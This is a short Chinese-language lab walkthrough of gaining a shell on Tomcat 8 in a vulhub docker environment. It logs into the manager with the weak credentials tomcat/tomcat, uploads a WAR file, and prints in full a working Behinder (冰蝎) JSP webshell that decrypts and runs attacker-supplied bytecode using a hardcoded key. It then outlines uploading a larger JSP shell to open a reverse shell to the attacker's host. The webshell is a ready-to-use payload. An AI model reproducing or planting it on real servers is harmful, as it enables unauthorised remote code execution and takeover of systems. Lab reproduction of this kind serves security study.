Tomcat8 + 弱口令 && 后台getshell 漏洞复现
环境开启
启动docker开启镜像环境
vulhub镜像中的tomcat8文件目录下,docker-compose up -d
成功在主机上访问到
漏洞复现
根据弱密码tomcat/tomcat登陆管理后台
或者使用tomcat爆破工具
在下面位置可以找到上传点
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
上传对应的war文件,先把冰蝎jsp马保存到zip压缩包中,再修改后缀名为war上传。可以看到上传成功
在manager/satus可以看到服务器状态
冰蝎连接
连接成功
上传jsp大马反弹shell
修改对应主机ip
开启监听对应窗口
上传
然后点击send进行命令控制
详情请看这个博客:https://idc.wanyunshuju.com/aqld/2005.html